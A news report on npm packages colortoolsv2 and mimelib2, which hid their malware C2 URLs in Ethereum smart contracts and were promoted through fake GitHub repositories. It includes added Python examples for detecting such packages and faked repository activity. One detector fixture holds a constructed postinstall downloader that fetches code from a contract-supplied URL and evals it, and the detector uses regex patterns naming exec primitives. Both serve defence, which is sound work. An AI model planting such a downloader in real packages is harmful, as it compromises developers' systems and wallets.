Ethereum Exploited in Advanced Malware Campaign Targeting Open Source Devs
Hackers used Ethereum smart contracts to hide malware in npm packages, targeting crypto developers in a stealthy new open-source supply chain attack.
Cybersecurity experts have uncovered a new type of software supply chain attack using Ethereum smart contracts to deliver malware.
According to researchers at ReversingLabs, two malicious packages were uploaded to the npm registry in July. These packages, named colortoolsv2 and mimelib2, used the Ethereum blockchain in an unexpected way: to hide and deliver malicious URLs.
The packages posed as simple, developer-friendly tools. However, once downloaded, they acted as delivery agents for more dangerous malware. Typically, in malware campaigns, the harmful command-and-control (C2) URLs are hardcoded into the malicious code.
That method is easier to detect and block. In contrast, these packages retrieved the C2 URLs from Ethereum smart contracts, blending malicious communication into regular blockchain activity. This clever method significantly reduced the chance of early detection.
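The article does not publish the packages' code, so the heuristic below is an added triage example (not ReversingLabs' tooling) built on the point the paragraph makes: a URL-scanning check misses a downloader whose C2 address is read from a contract at runtime, so a defender should instead flag install hooks and files that combine an Ethereum contract read with a fetch-and-execute pattern. The indicator patterns and the sample package are assumptions, not the real packages.

```python
"""Heuristic triage for npm package contents: flags JavaScript that reads data
from an Ethereum contract AND fetches/executes something obtained at runtime.
Added example, not ReversingLabs' tooling; the indicators are assumptions about
typical second-stage downloader behaviour, not the real packages' code."""
import re

# Signs that code talks to an Ethereum node or contract (assumed indicators).
CHAIN_READ = re.compile(
    r"eth_call|getContract|new\s+ethers\.Contract|web3\.eth\.Contract|"
    r"infura\.io|alchemy\.com|mainnet", re.IGNORECASE)
# Signs of a downloader: dynamic fetch plus execution or a write to disk.
FETCH = re.compile(r"\bfetch\(|https?\.get\(|axios\.|request\(", re.IGNORECASE)
EXEC = re.compile(r"\beval\(|new\s+Function\(|child_process|\.exec\(|spawn\(|writeFileSync")
HARDCODED_URL = re.compile(r"https?://[^\s'\"]+")


def triage(package_json: dict, files: dict) -> list:
    """Return findings for one package. `files` maps path -> JS source text."""
    findings = []
    scripts = package_json.get("scripts", {})
    for hook in ("preinstall", "install", "postinstall"):
        if hook in scripts:
            findings.append(f"install hook '{hook}': {scripts[hook]}")
    for path, src in files.items():
        chain = bool(CHAIN_READ.search(src))
        fetch = bool(FETCH.search(src))
        exe = bool(EXEC.search(src))
        urls = HARDCODED_URL.findall(src)
        if chain and (fetch or exe):
            findings.append(f"{path}: contract read combined with download/exec; "
                            "URL is resolved at runtime rather than hardcoded")
        elif fetch and exe and not urls:
            findings.append(f"{path}: downloader pattern with no hardcoded URL")
    return findings


# Constructed sample package (not colortoolsv2 or mimelib2): a postinstall
# script reads a URL from a contract, fetches it and evaluates the response.
SAMPLE_PKG = {"name": "example-colors", "scripts": {"postinstall": "node setup.js"}}
SAMPLE_FILES = {
    "setup.js": (
        "const {ethers} = require('ethers');\n"
        "const p = new ethers.JsonRpcProvider(process.env.RPC);\n"
        "const c = new ethers.Contract(ADDR, ABI, p);\n"
        "c.getUrl().then(u => fetch(u).then(r => r.text()).then(code => eval(code)));\n"),
    "index.js": "module.exports = {red: '#f00'};\n",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_PKG, SAMPLE_FILES):
        print("FLAG:", finding)
```

A scanner that only greps for URLs, as the paragraph notes, would report nothing for setup.js; the combination rule is what surfaces it.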
“This is something we haven’t seen previously. It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open-source repositories and developers”, the ReversingLabs researchers explained.
The two packages were minimal in code and size. Each contained only what was necessary to launch the second stage of the attack. Once installed, they reached out to a C2 server, downloaded a secondary payload, and began compromising the host system.
The colortoolsv2 package was the first of the two discovered. Once its activity was flagged, it was promptly removed from npm, but the attackers were quick to respond.
A nearly identical package named mimelib2 was uploaded soon after. It carried the same malicious payload and behaviour, indicating a persistent and well-coordinated effort.
Lucija Valentić, a researcher at ReversingLabs, confirmed, “The two npm packages abused smart contracts to conceal illegal commands that installed downloader malware on compromised systems”.
This method of using Ethereum smart contracts as a vehicle for malware distribution represents a shift in how attackers think about and use blockchain technologies, not for crypto gains directly, but as a reliable tool in cyber campaigns.
Fake GitHub Projects Added Legitimacy
The malware campaign went beyond npm packages. It also relied on an extensive network of fake GitHub repositories. These were set up to create a convincing image of active, legitimate crypto projects.
The repositories were made to appear trustworthy to unsuspecting developers and crypto enthusiasts browsing GitHub.
Each fake repository was linked to the malicious npm packages. For example, one such project, solana-trading-bot-v2, appeared to be a functional trading bot for Solana. It included thousands of commits, active contributors, and a growing number of stars.
However, these indicators were fabricated. The commits were generated automatically and the contributors were fake accounts, sockpuppets created around the same time as the npm packages.
“When we dug into the large number of commits and what was committed, it quickly became apparent that the code contributors were also fakes”, the ReversingLabs analysts said.
“In fact, there are thousands of commits and each day that number increases by a couple of thousand, indicating that the malicious actor has set up an infrastructure for automated commit pushing”, they added.
These deceptive tactics were also applied to other repositories. Names like ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot were used.
Although these were less convincing in their setup, they followed the same template: fake activity, cloned contributors, and documentation designed to make the projects appear legitimate.
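The signals the analysts describe above (commit counts growing by thousands a day, contributor accounts created in one batch alongside the packages) can be checked before trusting a repository. This is an added example with constructed data; it is not ReversingLabs' method, and the thresholds are assumptions.

```python
"""Scores a repository's 'activity' signals the way a reviewer might before
trusting it: commit volume per day and whether contributor accounts were all
created within a narrow window. Added example with constructed data; not
ReversingLabs' method, and the thresholds are assumptions."""
from collections import Counter
from datetime import date, timedelta


def commits_per_day(commit_dates):
    """Map each day to its commit count."""
    return Counter(commit_dates)


def account_age_cluster(created_dates, window_days=14):
    """Fraction of contributor accounts created within `window_days` of the
    earliest one. A value near 1.0 suggests sockpuppets made in one batch."""
    if not created_dates:
        return 0.0
    first = min(created_dates)
    inside = sum(1 for d in created_dates if (d - first).days <= window_days)
    return inside / len(created_dates)


def assess(commit_dates, created_dates, repo_created, max_daily=500, cluster=0.8):
    """Return human-readable warnings for a repository (thresholds assumed)."""
    warnings = []
    busiest_day, busiest = max(commits_per_day(commit_dates).items(), key=lambda kv: kv[1])
    if busiest > max_daily:
        warnings.append(f"{busiest} commits on {busiest_day}: likely automated pushing")
    frac = account_age_cluster(created_dates)
    if frac >= cluster:
        warnings.append(f"{frac:.0%} of contributor accounts created within 14 days of each other")
    if created_dates and min(created_dates) >= repo_created - timedelta(days=30):
        warnings.append("no contributor account is meaningfully older than the repository")
    return warnings


# Constructed sample resembling the description above: ~2,000 commits per day
# for a week, and every contributor account created the same week as the repo.
REPO_CREATED = date(2025, 7, 1)  # placeholder date, not from the report
COMMITS = [REPO_CREATED + timedelta(days=d) for d in range(7) for _ in range(2000)]
CONTRIBS = [REPO_CREATED + timedelta(days=i % 5) for i in range(12)]

if __name__ == "__main__":
    for w in assess(COMMITS, CONTRIBS, REPO_CREATED):
        print("WARN:", w)
```

A genuine project with a few commits a day and contributors whose accounts predate it by years produces no warnings.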
The objective was clear: trick developers into incorporating malicious code into their own projects. Once the infected npm packages were added, they acted as a backdoor, allowing the attackers to install further malware and potentially steal sensitive data, access development environments, or compromise cryptocurrency wallets.
A Pattern of Targeting the Crypto Ecosystem
This recent malware campaign is not an isolated event. Instead, it is part of a rising trend of cyberattacks specifically targeting the open-source software supply chain and the cryptocurrency space.
ReversingLabs has noted that in 2024 alone, 23 campaigns were observed in which attackers planted malicious code in open-source projects. These incidents often targeted developers working on or around cryptocurrency applications.
In past cases, attackers have experimented with several stealth techniques. In 2023, Python packages were found hiding malware inside GitHub Gists.
Even earlier, in 2022, a fake Tailwind CSS npm package hid its C2 URLs behind popular platforms like Google Drive and OneDrive. These efforts show how cybercriminals are constantly testing new delivery methods to stay ahead of traditional security tools.
The latest Ethereum-based attack shows just how much this approach has evolved. By using blockchain smart contracts, tools that are public, decentralised, and often considered secure, the attackers found a way to mask malware instructions behind legitimate-looking blockchain transactions.
Valentić pointed out that this should serve as a wake-up call to the developer community, saying:
“These latest attacks by threat actors, including the creation of sophisticated attacks using Ethereum blockchain and GitHub, show that attacks on repositories are evolving and that developers and development organisations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets and steal sensitive data and digital assets.”
Notably, the use of Ethereum smart contracts as a hiding place for malicious instructions is not completely without precedent. The notorious Lazarus Group, affiliated with North Korea, had previously used Ethereum smart contracts in different forms of attacks.
But this is one of the first known cases where smart contracts were specifically used to store malware distribution URLs.
ReversingLabs also revealed that the entire infrastructure behind the attack was built with long-term use in mind. The npm packages and GitHub repositories were not isolated attempts.
Instead, they were part of a broader campaign to maintain a persistent threat presence across open-source platforms, focusing particularly on cryptocurrency projects.
In conclusion, the findings highlight an urgent need for developers, especially those in the crypto world, to be cautious when relying on open-source packages.
With threat actors using increasingly clever techniques, even tools that appear trustworthy can be Trojan horses.
As blockchain continues to grow in popularity, it is not just a target for attacks; it is also becoming part of the attack strategy itself.